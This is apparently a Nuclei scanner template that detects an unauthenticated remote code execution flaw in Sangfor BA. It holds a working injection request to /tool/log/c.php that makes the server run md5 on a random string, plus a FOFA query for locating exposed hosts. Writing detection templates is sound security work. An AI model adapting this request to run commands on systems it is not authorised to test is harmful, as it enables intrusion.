id: sangfor-ba-rce

info:
  name: Sangfor BA - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Sangfor products allow remote unauthenticated users to cause the product to execute arbitrary commands.
  reference:
    - https://mobile.twitter.com/sec715/status/1406886851072253953
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  metadata:
    verified: true
    fofa-query: app="sangfor"
  tags: rce,sangfor

requests:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5("{{randstr}}")}}'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
